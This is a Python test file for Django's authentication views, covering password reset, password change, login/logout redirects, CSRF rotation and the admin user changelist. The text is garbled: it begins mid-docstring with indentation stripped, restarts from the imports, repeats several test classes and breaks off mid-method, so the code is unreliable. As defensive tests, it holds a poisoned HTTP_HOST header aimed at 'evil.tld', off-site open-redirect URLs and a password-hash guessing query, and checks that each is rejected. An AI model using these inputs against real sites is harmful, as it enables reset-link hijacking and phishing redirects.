Given two URLs, make sure all their components (the ones given by
urlparse) are equal, only comparing components that are present in both
URLs.
If `parse_qs` is True, then the querystrings are parsed with QueryDict.
This is useful if you don't want the order of parameters to matter.
Otherwise, the query strings are compared as-is.
"""
fields = ParseResult._fields
for attr, x, y in zip(fields, urlparse(url), urlparse(expected)):
if parse_qs and attr == 'query':
x, y = QueryDict(x), QueryDict(y)
if x and y and x != y:
self.fail("%r != %r (%s doesn't match)" % (url, expected, attr))
@skipIfCustomUser
class AuthViewNamedURLTests(AuthViewsTestCase):
urls = 'django.contrib.auth.urls'
def test_named_urls(self):
"Named URLs should be reversible"
expected_named_urls = [
('login', [], {}),
('logout', [], {}),
('password_change', [], {}),
('password_change_done', [], {}),
('password_reset', [], {}),
('password_reset_done', [], {}),
('password_reset_confirm', [], {
'uidb64': 'aaaaaaa',
'token': '1111-aaaaa',
}),
('password_reset_complete', [], {}),
]
for name, args, kwargs in expected_named_urls:
try:
reverse(name, args=args, kwargs=kwargs)
except NoReverseMatch:
self.fail("Reversal of url named '%s' failed with NoReverseMatch" % name)
@skipIfCustomUser
class PasswordResetTest(AuthViewsTestCase):
def test_email_not_found(self):
"""If the provided email is not registered, don't raise any error but
also don't send any email."""
response = self.client.get('/password_reset/')
self.assertEqual(response.status_code, 200)
response = self.client.post('/password_reset/', {'email': 'not_a_real_email@email.com'})
self.assertEqual(response.status_code, 302)
self.assertEqual(len(mail.outbox), 0)
def test_email_found(self):
"Email is sent if a valid email address is provided for password reset"
response = self.client.post('/password_reset/', {'email': 'staffmember@example.com'})
self.assertEqual(response.status_code, 302)
self.assertEqual(len(mail.outbox), 1)
self.assertTrue("http://" in mail.outbox[0].body)
self.assertEqual(settings.DEFAULT_FROM_EMAIL, mail.outbox[0].from_email)
# optional multipart text/html email has been added. Make sure original,
# default functionality is 100% the same
self.assertFalse(mail.outbox[0].message().is_multipart())
def test_html_mail_template(self):
"""
A multipart email with text/plain and text/html is sent
if the html_email_template parameter is passed to the view
"""
response = self.client.post('/password_reset/html_email_template/', {'email': 'staffmember@example.com'})
self.assertEqual(response.status_code, 302)
self.assertEqual(len(mail.outbox), 1)
message = mail.outbox[0].message()
self.assertEqual(len(message.get_payload()), 2)
self.assertTrue(message.is_multipart())
self.assertEqual(message.get_payload(0).get_content_type(), 'text/plain')
self.assertEqual(message.get_payload(1).get_content_type(), 'text/html')
self.assertTrue('<html>' not in message.get_payload(0).get_payload())
self.assertTrue('<html>' in message.get_payload(1).get_payload())
def test_email_found_custom_from(self):
"Email is sent if a valid email address is provided for password reset when a custom from_email is provided."
response = self.client.post('/password_reset_from_email/', {'email': 'staffmember@example.com'})
self.assertEqual(response.status_code, 302)
self.assertEqual(len(mail.outbox), 1)
self.assertEqual("staffmember@example.com", mail.outbox[0].from_email)
@override_settings(ALLOWED_HOSTS=['adminsite.com'])
def test_admin_reset(self):
"If the reset view is marked as being for admin, the HTTP_HOST header is used for a domain override."
response = self.client.post('/admin_password_reset/',
{'email': 'staffmember@example.com'},
HTTP_HOST='adminsite.com'
)
self.assertEqual(response.status_code, 302)
self.assertEqual(len(mail.outbox), 1)
self.assertTrue("http://adminsite.com" in mail.outbox[0].body)
self.assertEqual(settings.DEFAULT_FROM_EMAIL, mail.outbox[0].from_email)
# Skip any 500 handler action (like sending more mail...)
@override_settings(DEBUG_PROPAGATE_EXCEPTIONS=True)
def test_poisoned_http_host(self):
"Poisoned HTTP_HOST headers can't be used for reset emails"
# This attack is based on the way browsers handle URLs. The colon
# should be used to separate the port, but if the URL contains an @,
# the colon is interpreted as part of a username for login purposes,
# making 'evil.com' the request domain. Since HTTP_HOST is used to
# produce a meaningful reset URL, we need to be certain that the
# HTTP_HOST header isn't poisoned. This is done as a check when get_host()
# is invoked, but we check here as a practical consequence.
with patch_logger('django.security.DisallowedHost', 'error') as logger_calls:
response = self.client.post('/password_reset/',
{'email': 'staffmember@example.com'},
HTTP_HOST='www.example:dr.frankenstein@evil.tld'
)
self.assertEqual(response.status_code, 400)
self.assertEqual(len(mail.outbox), 0)
self.assertEqual(len(logger_calls), 1)
# Skip any 500 handler action (like sending more mail...)
@override_settings(DEBUG_PROPAGATE_EXCEPTIONS=True)
def test_poisoned_http_host_admin_site(self):
"Poisoned HTTP_HOST headers can't be used for reset emails on admin views"
with patch_logger('django.security.DisallowedHost', 'error') as logger_calls:
response = self.client.post('/admin_password_reset/',
{'email': 'staffmember@example.com'},
HTTP_HOST='www.example:dr.frankenstein@evil.tld'
)
self.assertEqual(response.status_code, 400)
self.assertEqual(len(mail.outbox), 0)
self.assertEqual(len(logger_calls), 1)
def _test_confirm_start(self):
# Start by creating the email
self.client.post('/password_reset/', {'email': 'staffmember@example.com'})
self.assertEqual(len(mail.outbox), 1)
return self._read_signup_email(mail.outbox[0])
def _read_signup_email(self, email):
urlmatch = re.search(r"https?://[^/]*(/.*reset/\S*)", email.body)
self.assertTrue(urlmatch is not None, "No URL found in sent email")
return urlmatch.group(), urlmatch.groups()[0]
def test_confirm_valid(self):
url, path = self._test_confirm_start()
response = self.client.get(path)
# redirect to a 'complete' page:
self.assertContains(response, "Please enter your new password")
def test_confirm_invalid(self):
url, path = self._test_confirm_start()
# Let's munge the token in the path, but keep the same length,
# in case the URLconf will reject a different length.
path = path[:-5] + ("0" * 4) + path[-1]
response = self.client.get(path)
self.assertContains(response, "The password reset link was invalid")
    def test_confirm_invalid_user(self):
        # Ensure that we get a 200 response for a non-existent user, not a 404
        response = self.client.get('/reset/123456/1-1/')
        self.assertContains(response, "The password reset link was invalid")
    def test_confirm_overflow_user(self):
        # Ensure that we get a 200 response for a base36 user id that overflows int
        # ('zzzzzzzzzzzzz' decodes to a value far beyond any real pk).
        response = self.client.get('/reset/zzzzzzzzzzzzz/1-1/')
        self.assertContains(response, "The password reset link was invalid")
def test_confirm_invalid_post(self):
# Same as test_confirm_invalid, but trying
# to do a POST instead.
url, path = self._test_confirm_start()
path = path[:-5] + ("0" * 4) + path[-1]
self.client.post(path, {
'new_password1': 'anewpassword',
'new_password2': ' anewpassword',
})
# Check the password has not been changed
u = User.objects.get(email='staffmember@example.com')
self.assertTrue(not u.check_password("anewpassword"))
def test_confirm_complete(self):
url, path = self._test_confirm_start()
response = self.client.post(path, {'new_password1': 'anewpassword',
'new_password2': 'anewpassword'})
# Check the password has been changed
u = User.objects.get(email='staffmember@example.com')
self.assertTrue(u.check_password("anewpassword"))
# Check we can't use the link again
response = self.client.get(path)
self.assertContains(response, "The password reset link was invalid")
def test_confirm_different_passwords(self):
url, path = self._test_confirm_start()
response = self.client.post(path, {'new_password1': 'anewpassword',
'new_password2': 'x'})
self.assertFormError(response, SetPasswordForm.error_messages['password_mismatch'])
def test_reset_redirect_default(self):
response = self.client.post('/password_reset/',
{'email': 'staffmember@example.com'})
self.assertEqual(response.status_code, 302)
self.assertURLEqual(response.url, '/password_reset/done/')
def test_reset_custom_redirect(self):
response = self.client.post('/password_reset/custom_redirect/',
{'email': 'staffmember@example.com'})
self.assertEqual(response.status_code, 302)
self.assertURLEqual(response.url, '/custom/')
def test_reset_custom_redirect_named(self):
response = self.client.post('/password_reset/custom_redirect/named/',
{'email': 'staffmember@example.com'})
self.assertEqual(response.status_code, 302)
self.assertURLEqual(response.url, '/password_reset/')
def test_confirm_redirect_default(self):
url, path = self._test_confirm_start()
response = self.client.post(path, {'new_password1': 'anewpassword',
'new_password2': 'anewpassword'})
self.assertEqual(response.status_code, 302)
self.assertURLEqual(response.url, '/reset/done/')
def test_confirm_redirect_custom(self):
url, path = self._test_confirm_start()
path = path.replace('/reset/', '/reset/custom/')
response = self.client.post(path, {'new_password1': 'anewpassword',
'new_password2': 'anewpassword'})
self.assertEqual(response.status_code, 302)
self.assertURLEqual(response.url, '/custom/')
def test_confirm_redirect_custom_named(self):
url, path = self._test_confirm_start()
path = path.replace('/reset/', '/reset/custom/named/')
response = self.client.post(path, {'new_password1': 'anewpassword',
'new_password2': 'anewpassword'})
self.assertEqual(response.status_code, 302)
self.assertURLEqual(response.url, '/password_reset/')
@override_settings(AUTH_USER_MODEL='auth.CustomUser')
class CustomUserPasswordResetTest(AuthViewsTestCase):
    """The password-reset flow also works with a swapped custom user model."""
    fixtures = ['custom_user.json']

    def _test_confirm_start(self):
        # Request the reset email and return the link it contains.
        response = self.client.post('/password_reset/',
                                    {'email': 'staffmember@example.com'})
        self.assertEqual(response.status_code, 302)
        self.assertEqual(len(mail.outbox), 1)
        return self._read_signup_email(mail.outbox[0])

    def _read_signup_email(self, email):
        # Pull the absolute reset URL and its path out of the message body.
        match = re.search(r"https?://[^/]*(/.*reset/\S*)", email.body)
        self.assertTrue(match is not None, "No URL found in sent email")
        return match.group(), match.groups()[0]

    def test_confirm_valid_custom_user(self):
        url, path = self._test_confirm_start()
        response = self.client.get(path)
        # A valid link shows the password-entry form.
        self.assertContains(response, "Please enter your new password")
@skipIfCustomUser
class ChangePasswordTest(AuthViewsTestCase):
    """Tests for the password_change view: validation, success and redirects."""

    def fail_login(self, password='password'):
        # Attempt a login that is expected to fail and assert the standard
        # invalid-login form error is shown.
        response = self.client.post('/login/', {
            'username': 'testclient',
            'password': password,
        })
        self.assertFormError(response, AuthenticationForm.error_messages['invalid_login'] % {
            'username': User._meta.get_field('username').verbose_name
        })

    def logout(self):
        self.client.get('/logout/')

    def test_password_change_fails_with_invalid_old_password(self):
        self.login()
        # 'donuts' is not the current password.
        response = self.client.post('/password_change/', {
            'old_password': 'donuts',
            'new_password1': 'password1',
            'new_password2': 'password1',
        })
        self.assertFormError(response, PasswordChangeForm.error_messages['password_incorrect'])

    def test_password_change_fails_with_mismatched_passwords(self):
        self.login()
        response = self.client.post('/password_change/', {
            'old_password': 'password',
            'new_password1': 'password1',
            'new_password2': 'donuts',
        })
        self.assertFormError(response, SetPasswordForm.error_messages['password_mismatch'])

    def test_password_change_succeeds(self):
        self.login()
        self.client.post('/password_change/', {
            'old_password': 'password',
            'new_password1': 'password1',
            'new_password2': 'password1',
        })
        # Old credentials are now rejected; new ones are accepted.
        self.fail_login()
        self.login(password='password1')

    def test_password_change_done_succeeds(self):
        self.login()
        response = self.client.post('/password_change/', {
            'old_password': 'password',
            'new_password1': 'password1',
            'new_password2': 'password1',
        })
        self.assertEqual(response.status_code, 302)
        self.assertURLEqual(response.url, '/password_change/done/')

    @override_settings(LOGIN_URL='/login/')
    def test_password_change_done_fails(self):
        # The done page requires authentication and bounces to LOGIN_URL.
        response = self.client.get('/password_change/done/')
        self.assertEqual(response.status_code, 302)
        self.assertURLEqual(response.url, '/login/?next=/password_change/done/')

    def test_password_change_redirect_default(self):
        self.login()
        response = self.client.post('/password_change/', {
            'old_password': 'password',
            'new_password1': 'password1',
            'new_password2': 'password1',
        })
        self.assertEqual(response.status_code, 302)
        self.assertURLEqual(response.url, '/password_change/done/')

    def test_password_change_redirect_custom(self):
        # View variant configured with a literal post_change_redirect URL.
        self.login()
        response = self.client.post('/password_change/custom/', {
            'old_password': 'password',
            'new_password1': 'password1',
            'new_password2': 'password1',
        })
        self.assertEqual(response.status_code, 302)
        self.assertURLEqual(response.url, '/custom/')

    def test_password_change_redirect_custom_named(self):
        # View variant whose post_change_redirect is a URL-pattern name.
        self.login()
        response = self.client.post('/password_change/custom/named/', {
            'old_password': 'password',
            'new_password1': 'password1',
            'new_password2': 'password1',
        })
        self.assertEqual(response.status_code, 302)
        self.assertURLEqual(response.url, '/password_reset/')
@skipIfCustomUser
class LoginTest(AuthViewsTestCase):
    """Tests for the login view: context, redirect safety and CSRF rotation."""

    def test_current_site_in_context_after_login(self):
        response = self.client.get(reverse('login'))
        self.assertEqual(response.status_code, 200)
        # 'site' is the current Site when the sites framework is installed,
        # otherwise a RequestSite built from the request.
        if Site._meta.installed:
            site = Site.objects.get_current()
            self.assertEqual(response.context['site'], site)
            self.assertEqual(response.context['site_name'], site.name)
        else:
            self.assertIsInstance(response.context['site'], RequestSite)
        self.assertTrue(isinstance(response.context['form'], AuthenticationForm),
                        'Login form is not an AuthenticationForm')

    def test_security_check(self, password='password'):
        # The ?next= redirect target must never point off-site.
        login_url = reverse('login')
        # Those URLs should not pass the security check
        # NOTE(review): 'exampel.com' looks like a typo for 'example.com' —
        # harmless here, as the test only needs a non-local absolute URL.
        for bad_url in ('http://example.com',
                        'https://example.com',
                        'ftp://exampel.com',
                        '//example.com'):
            nasty_url = '%(url)s?%(next)s=%(bad_url)s' % {
                'url': login_url,
                'next': REDIRECT_FIELD_NAME,
                'bad_url': urlquote(bad_url),
            }
            response = self.client.post(nasty_url, {
                'username': 'testclient',
                'password': password,
            })
            self.assertEqual(response.status_code, 302)
            self.assertFalse(bad_url in response.url,
                             "%s should be blocked" % bad_url)
        # These URLs *should* still pass the security check
        for good_url in ('/view/?param=http://example.com',
                         '/view/?param=https://example.com',
                         '/view?param=ftp://exampel.com',
                         'view/?param=//example.com',
                         'https:///',
                         '//testserver/',
                         '/url%20with%20spaces/'):  # see ticket #12534
            safe_url = '%(url)s?%(next)s=%(good_url)s' % {
                'url': login_url,
                'next': REDIRECT_FIELD_NAME,
                'good_url': urlquote(good_url),
            }
            response = self.client.post(safe_url, {
                'username': 'testclient',
                'password': password,
            })
            self.assertEqual(response.status_code, 302)
            self.assertTrue(good_url in response.url,
                            "%s should be allowed" % good_url)

    def test_login_form_contains_request(self):
        # 15198
        self.client.post('/custom_requestauth_login/', {
            'username': 'testclient',
            'password': 'password',
        }, follow=True)
        # the custom authentication form used by this login asserts
        # that a request is passed to the form successfully.

    def test_login_csrf_rotate(self, password='password'):
        """
        Makes sure that a login rotates the currently-used CSRF token.
        """
        # Do a GET to establish a CSRF token
        # TestClient isn't used here as we're testing middleware, essentially.
        req = HttpRequest()
        CsrfViewMiddleware().process_view(req, login_view, (), {})
        req.META["CSRF_COOKIE_USED"] = True
        resp = login_view(req)
        resp2 = CsrfViewMiddleware().process_response(req, resp)
        csrf_cookie = resp2.cookies.get(settings.CSRF_COOKIE_NAME, None)
        token1 = csrf_cookie.coded_value
        # Prepare the POST request
        req = HttpRequest()
        req.COOKIES[settings.CSRF_COOKIE_NAME] = token1
        req.method = "POST"
        req.POST = {'username': 'testclient', 'password': password, 'csrfmiddlewaretoken': token1}
        req.REQUEST = req.POST
        # Use POST request to log in
        SessionMiddleware().process_request(req)
        CsrfViewMiddleware().process_view(req, login_view, (), {})
        req.META["SERVER_NAME"] = "testserver"  # Required to have redirect work in login view
        req.META["SERVER_PORT"] = 80
        req.META["CSRF_COOKIE_USED"] = True
        resp = login_view(req)
        resp2 = CsrfViewMiddleware().process_response(req, resp)
        csrf_cookie = resp2.cookies.get(settings.CSRF_COOKIE_NAME, None)
        token2 = csrf_cookie.coded_value
        # Check the CSRF token switched
        self.assertNotEqual(token1, token2)
@skipIfCustomUser
class LoginURLSettings(AuthViewsTestCase):
    """Tests for settings.LOGIN_URL."""

    def assertLoginURLEquals(self, url, parse_qs=False):
        # Hit a login_required view anonymously and assert the redirect
        # target built from LOGIN_URL matches `url`.
        response = self.client.get('/login_required/')
        self.assertEqual(response.status_code, 302)
        self.assertURLEqual(response.url, url, parse_qs=parse_qs)

    @override_settings(LOGIN_URL='/login/')
    def test_standard_login_url(self):
        self.assertLoginURLEquals('/login/?next=/login_required/')

    @override_settings(LOGIN_URL='login')
    def test_named_login_url(self):
        # A URL-pattern name is reversed before use.
        self.assertLoginURLEquals('/login/?next=/login_required/')

    @override_settings(LOGIN_URL='http://remote.example.com/login')
    def test_remote_login_url(self):
        # A fully-qualified LOGIN_URL makes ?next= absolute (and quoted).
        quoted_next = urlquote('http://testserver/login_required/')
        expected = 'http://remote.example.com/login?next=%s' % quoted_next
        self.assertLoginURLEquals(expected)

    @override_settings(LOGIN_URL='https:///login/')
    def test_https_login_url(self):
        quoted_next = urlquote('http://testserver/login_required/')
        expected = 'https:///login/?next=%s' % quoted_next
        self.assertLoginURLEquals(expected)

    @override_settings(LOGIN_URL='/login/?pretty=1')
    def test_login_url_with_querystring(self):
        # Existing query parameters on LOGIN_URL are preserved.
        self.assertLoginURLEquals('/login/?pretty=1&next=/login_required/', parse_qs=True)

    @override_settings(LOGIN_URL='http://remote.example.com/login/?next=/default/')
    def test_remote_login_url_with_next_querystring(self):
        # An existing ?next= on LOGIN_URL is replaced with the real target.
        quoted_next = urlquote('http://testserver/login_required/')
        expected = 'http://remote.example.com/login/?next=%s' % quoted_next
        self.assertLoginURLEquals(expected)
@skipIfCustomUser
class LoginRedirectUrlTest(AuthViewsTestCase):
    """Tests for settings.LOGIN_REDIRECT_URL."""

    def assertLoginRedirectURLEqual(self, url):
        # Log in and check where the login view redirects afterwards.
        login_response = self.login()
        self.assertEqual(login_response.status_code, 302)
        self.assertURLEqual(login_response.url, url)

    def test_default(self):
        self.assertLoginRedirectURLEqual('/accounts/profile/')

    @override_settings(LOGIN_REDIRECT_URL='/custom/')
    def test_custom(self):
        self.assertLoginRedirectURLEqual('/custom/')

    @override_settings(LOGIN_REDIRECT_URL='password_reset')
    def test_named(self):
        # A URL-pattern name is resolved before redirecting.
        self.assertLoginRedirectURLEqual('/password_reset/')

    @override_settings(LOGIN_REDIRECT_URL='http://remote.example.com/welcome/')
    def test_remote(self):
        self.assertLoginRedirectURLEqual('http://remote.example.com/welcome/')
@skipIfCustomUser
class LogoutTest(AuthViewsTestCase):
    """Tests for the logout view: templates, redirects and ?next= handling."""

    def confirm_logged_out(self):
        # The session no longer carries an authenticated user id.
        self.assertTrue(SESSION_KEY not in self.client.session)

    def test_logout_default(self):
        "Logout without next_page option renders the default template"
        self.login()
        response = self.client.get('/logout/')
        self.assertContains(response, 'Logged out')
        self.confirm_logged_out()

    def test_14377(self):
        # Bug 14377: 'site' must be available in the logout template context.
        self.login()
        response = self.client.get('/logout/')
        self.assertTrue('site' in response.context)

    def test_logout_with_overridden_redirect_url(self):
        # Bug 11223: a ?next= parameter overrides the view's next_page.
        self.login()
        response = self.client.get('/logout/next_page/')
        self.assertEqual(response.status_code, 302)
        self.assertURLEqual(response.url, '/somewhere/')
        response = self.client.get('/logout/next_page/?next=/login/')
        self.assertEqual(response.status_code, 302)
        self.assertURLEqual(response.url, '/login/')
        self.confirm_logged_out()

    def test_logout_with_next_page_specified(self):
        "Logout with next_page option given redirects to specified resource"
        self.login()
        response = self.client.get('/logout/next_page/')
        self.assertEqual(response.status_code, 302)
        self.assertURLEqual(response.url, '/somewhere/')
        self.confirm_logged_out()

    def test_logout_with_redirect_argument(self):
        "Logout with query string redirects to specified resource"
        self.login()
        response = self.client.get('/logout/?next=/login/')
        self.assertEqual(response.status_code, 302)
        self.assertURLEqual(response.url, '/login/')
        self.confirm_logged_out()

    def test_logout_with_custom_redirect_argument(self):
        "Logout with custom query string redirects to specified resource"
        self.login()
        response = self.client.get('/logout/custom_query/?follow=/somewhere/')
        self.assertEqual(response.status_code, 302)
        self.assertURLEqual(response.url, '/somewhere/')
        self.confirm_logged_out()

    def test_logout_with_named_redirect(self):
        "Logout resolves names or URLs passed as next_page."
        self.login()
        response = self.client.get('/logout/next_page/named/')
        self.assertEqual(response.status_code, 302)
        self.assertURLEqual(response.url, '/password_reset/')
        self.confirm_logged_out()

    def test_security_check(self, password='password'):
        # The ?next= target must never redirect off-site after logout.
        logout_url = reverse('logout')
        # Those URLs should not pass the security check
        for bad_url in ('http://example.com',
                        'https://example.com',
                        'ftp://exampel.com',
                        '//example.com'):
            nasty_url = '%(url)s?%(next)s=%(bad_url)s' % {
                'url': logout_url,
                'next': REDIRECT_FIELD_NAME,
                'bad_url': urlquote(bad_url),
            }
            self.login()
            response = self.client.get(nasty_url)
            self.assertEqual(response.status_code, 302)
            self.assertFalse(bad_url in response.url,
                             "%s should be blocked" % bad_url)
            self.confirm_logged_out()
        # These URLs *should* still pass the security check
        for good_url in ('/view/?param=http://example.com',
                         '/view/?param=https://example.com',
                         '/view?param=ftp://exampel.com',
                         'view/?param=//example.com',
                         'https:///',
                         '//testserver/',
                         '/url%20with%20spaces/'):  # see ticket #12534
            safe_url = '%(url)s?%(next)s=%(good_url)s' % {
                'url': logout_url,
                'next': REDIRECT_FIELD_NAME,
                'good_url': urlquote(good_url),
            }
            self.login()
            response = self.client.get(safe_url)
            self.assertEqual(response.status_code, 302)
            self.assertTrue(good_url in response.url,
                            "%s should be allowed" % good_url)
            self.confirm_logged_out()
@skipIfCustomUser
@override_settings(
    PASSWORD_HASHERS=('django.contrib.auth.hashers.SHA1PasswordHasher',),
)
class ChangelistTests(AuthViewsTestCase):
    """Admin changelist/changeform tests for the User model."""
    urls = 'django.contrib.auth.tests.urls_admin'

    def setUp(self):
        # Make me a superuser before logging in.
        User.objects.filter(username='testclient').update(is_staff=True, is_superuser=True)
        self.login()
        self.admin = User.objects.get(pk=1)

    def get_user_data(self, user):
        # Serialize a user the way the admin change form posts it back,
        # including the split date/time widget fields and their 'initial-'
        # counterparts (needed for change detection).
        return {
            'username': user.username,
            'password': user.password,
            'email': user.email,
            'is_active': user.is_active,
            'is_staff': user.is_staff,
            'is_superuser': user.is_superuser,
            'last_login_0': user.last_login.strftime('%Y-%m-%d'),
            'last_login_1': user.last_login.strftime('%H:%M:%S'),
            'initial-last_login_0': user.last_login.strftime('%Y-%m-%d'),
            'initial-last_login_1': user.last_login.strftime('%H:%M:%S'),
            'date_joined_0': user.date_joined.strftime('%Y-%m-%d'),
            'date_joined_1': user.date_joined.strftime('%H:%M:%S'),
            'initial-date_joined_0': user.date_joined.strftime('%Y-%m-%d'),
            'initial-date_joined_1': user.date_joined.strftime('%H:%M:%S'),
            'first_name': user.first_name,
            'last_name': user.last_name,
        }

    # #20078 - users shouldn't be allowed to guess password hashes via
    # repeated password__startswith queries.
    def test_changelist_disallows_password_lookups(self):
        # A lookup that tries to filter on password isn't OK
        with patch_logger('django.security.DisallowedModelAdminLookup', 'error') as logger_calls:
            response = self.client.get('/admin/auth/user/?password__startswith=sha1$')
            self.assertEqual(response.status_code, 400)
            self.assertEqual(len(logger_calls), 1)

    def test_user_change_email(self):
        data = self.get_user_data(self.admin)
        data['email'] = 'new_' + data['email']
        response = self.client.post('/admin/auth/user/%s/' % self.admin.pk, data)
        self.assertRedirects(response, '/admin/auth/user/')
        # The admin log records exactly which field changed.
        row = LogEntry.objects.latest('id')
        self.assertEqual(row.change_message, 'Changed email.')

    def test_user_not_change(self):
        # Re-posting identical data is a no-op and logged as such.
        response = self.client.post('/admin/auth/user/%s/' % self.admin.pk,
                                    self.get_user_data(self.admin)
                                    )
        self.assertRedirects(response, '/admin/auth/user/')
        row = LogEntry.objects.latest('id')
        self.assertEqual(row.change_message, 'No fields changed.')

    def test_user_change_password(self):
        response = self.client.post('/admin/auth/user/%s/password/' % self.admin.pk, {
            'password1': 'password1',
            'password2': 'password1',
        })
        self.assertRedirects(response, '/admin/auth/user/%s/' % self.admin.pk)
        row = LogEntry.objects.latest('id')
        self.assertEqual(row.change_message, 'Changed password.')
        # The new password actually works for a fresh login.
        self.logout()
        self.login(password='password1')
| import itertools
import os
import re
try:
from urllib.parse import urlparse, ParseResult
except ImportError: # Python 2
from urlparse import urlparse, ParseResult
from django.conf import global_settings, settings
from django.contrib.sites.models import Site, RequestSite
from django.contrib.admin.models import LogEntry
from django.contrib.auth.models import User
from django.core import mail
from django.core.urlresolvers import reverse, NoReverseMatch
from django.http import QueryDict, HttpRequest
from django.utils.encoding import force_text
from django.utils.http import urlquote
from django.utils._os import upath
from django.test import TestCase
from django.test.utils import override_settings, patch_logger
from django.middleware.csrf import CsrfViewMiddleware
from django.contrib.sessions.middleware import SessionMiddleware
from django.contrib.auth import SESSION_KEY, REDIRECT_FIELD_NAME
from django.contrib.auth.forms import (AuthenticationForm, PasswordChangeForm,
SetPasswordForm)
from django.contrib.auth.tests.utils import skipIfCustomUser
from django.contrib.auth.views import login as login_view
@override_settings(
    LANGUAGES=(
        ('en', 'English'),
    ),
    LANGUAGE_CODE='en',
    TEMPLATE_LOADERS=global_settings.TEMPLATE_LOADERS,
    TEMPLATE_DIRS=(
        os.path.join(os.path.dirname(upath(__file__)), 'templates'),
    ),
    USE_TZ=False,
    PASSWORD_HASHERS=('django.contrib.auth.hashers.SHA1PasswordHasher',),
)
class AuthViewsTestCase(TestCase):
    """
    Helper base class for all the follow test cases.
    """
    fixtures = ['authtestdata.json']
    urls = 'django.contrib.auth.tests.urls'

    def login(self, password='password'):
        # Log the fixture user in through the real login view, assert a
        # session was established, and return the response so callers can
        # inspect the redirect.
        response = self.client.post('/login/', {
            'username': 'testclient',
            'password': password,
        })
        self.assertTrue(SESSION_KEY in self.client.session)
        return response

    def logout(self):
        response = self.client.get('/admin/logout/')
        self.assertEqual(response.status_code, 200)
        self.assertTrue(SESSION_KEY not in self.client.session)

    def assertFormError(self, response, error):
        """Assert that error is found in response.context['form'] errors"""
        form_errors = list(itertools.chain(*response.context['form'].errors.values()))
        self.assertIn(force_text(error), form_errors)

    def assertURLEqual(self, url, expected, parse_qs=False):
        """
        Given two URLs, make sure all their components (the ones given by
        urlparse) are equal, only comparing components that are present in both
        URLs.
        If `parse_qs` is True, then the querystrings are parsed with QueryDict.
        This is useful if you don't want the order of parameters to matter.
        Otherwise, the query strings are compared as-is.
        """
        fields = ParseResult._fields
        for attr, x, y in zip(fields, urlparse(url), urlparse(expected)):
            if parse_qs and attr == 'query':
                x, y = QueryDict(x), QueryDict(y)
            # Components empty on either side are deliberately skipped.
            if x and y and x != y:
                self.fail("%r != %r (%s doesn't match)" % (url, expected, attr))
@skipIfCustomUser
class AuthViewNamedURLTests(AuthViewsTestCase):
    urls = 'django.contrib.auth.urls'

    def test_named_urls(self):
        "Named URLs should be reversible"
        # Every URL name published by django.contrib.auth.urls, with the
        # arguments its pattern requires.
        cases = [
            ('login', [], {}),
            ('logout', [], {}),
            ('password_change', [], {}),
            ('password_change_done', [], {}),
            ('password_reset', [], {}),
            ('password_reset_done', [], {}),
            ('password_reset_confirm', [], {
                'uidb64': 'aaaaaaa',
                'token': '1111-aaaaa',
            }),
            ('password_reset_complete', [], {}),
        ]
        for view_name, view_args, view_kwargs in cases:
            try:
                reverse(view_name, args=view_args, kwargs=view_kwargs)
            except NoReverseMatch:
                self.fail("Reversal of url named '%s' failed with NoReverseMatch" % view_name)
@skipIfCustomUser
class PasswordResetTest(AuthViewsTestCase):
    """End-to-end tests for the password-reset views and emails."""

    def test_email_not_found(self):
        """If the provided email is not registered, don't raise any error but
        also don't send any email."""
        response = self.client.get('/password_reset/')
        self.assertEqual(response.status_code, 200)
        response = self.client.post('/password_reset/', {'email': 'not_a_real_email@email.com'})
        self.assertEqual(response.status_code, 302)
        self.assertEqual(len(mail.outbox), 0)

    def test_email_found(self):
        "Email is sent if a valid email address is provided for password reset"
        response = self.client.post('/password_reset/', {'email': 'staffmember@example.com'})
        self.assertEqual(response.status_code, 302)
        self.assertEqual(len(mail.outbox), 1)
        self.assertTrue("http://" in mail.outbox[0].body)
        self.assertEqual(settings.DEFAULT_FROM_EMAIL, mail.outbox[0].from_email)
        # optional multipart text/html email has been added. Make sure original,
        # default functionality is 100% the same
        self.assertFalse(mail.outbox[0].message().is_multipart())

    def test_html_mail_template(self):
        """
        A multipart email with text/plain and text/html is sent
        if the html_email_template parameter is passed to the view
        """
        response = self.client.post('/password_reset/html_email_template/', {'email': 'staffmember@example.com'})
        self.assertEqual(response.status_code, 302)
        self.assertEqual(len(mail.outbox), 1)
        message = mail.outbox[0].message()
        self.assertEqual(len(message.get_payload()), 2)
        self.assertTrue(message.is_multipart())
        self.assertEqual(message.get_payload(0).get_content_type(), 'text/plain')
        self.assertEqual(message.get_payload(1).get_content_type(), 'text/html')
        # Only the HTML alternative carries markup.
        self.assertTrue('<html>' not in message.get_payload(0).get_payload())
        self.assertTrue('<html>' in message.get_payload(1).get_payload())

    def test_email_found_custom_from(self):
        "Email is sent if a valid email address is provided for password reset when a custom from_email is provided."
        response = self.client.post('/password_reset_from_email/', {'email': 'staffmember@example.com'})
        self.assertEqual(response.status_code, 302)
        self.assertEqual(len(mail.outbox), 1)
        self.assertEqual("staffmember@example.com", mail.outbox[0].from_email)

    @override_settings(ALLOWED_HOSTS=['adminsite.com'])
    def test_admin_reset(self):
        "If the reset view is marked as being for admin, the HTTP_HOST header is used for a domain override."
        response = self.client.post('/admin_password_reset/',
                                    {'email': 'staffmember@example.com'},
                                    HTTP_HOST='adminsite.com'
                                    )
        self.assertEqual(response.status_code, 302)
        self.assertEqual(len(mail.outbox), 1)
        # The reset link uses the host supplied in the request header.
        self.assertTrue("http://adminsite.com" in mail.outbox[0].body)
        self.assertEqual(settings.DEFAULT_FROM_EMAIL, mail.outbox[0].from_email)

    # Skip any 500 handler action (like sending more mail...)
    @override_settings(DEBUG_PROPAGATE_EXCEPTIONS=True)
    def test_poisoned_http_host(self):
        "Poisoned HTTP_HOST headers can't be used for reset emails"
        # This attack is based on the way browsers handle URLs. The colon
        # should be used to separate the port, but if the URL contains an @,
        # the colon is interpreted as part of a username for login purposes,
        # making 'evil.com' the request domain. Since HTTP_HOST is used to
        # produce a meaningful reset URL, we need to be certain that the
        # HTTP_HOST header isn't poisoned. This is done as a check when get_host()
        # is invoked, but we check here as a practical consequence.
        with patch_logger('django.security.DisallowedHost', 'error') as logger_calls:
            response = self.client.post('/password_reset/',
                                        {'email': 'staffmember@example.com'},
                                        HTTP_HOST='www.example:dr.frankenstein@evil.tld'
                                        )
            self.assertEqual(response.status_code, 400)
            self.assertEqual(len(mail.outbox), 0)
            self.assertEqual(len(logger_calls), 1)

    # Skip any 500 handler action (like sending more mail...)
    @override_settings(DEBUG_PROPAGATE_EXCEPTIONS=True)
    def test_poisoned_http_host_admin_site(self):
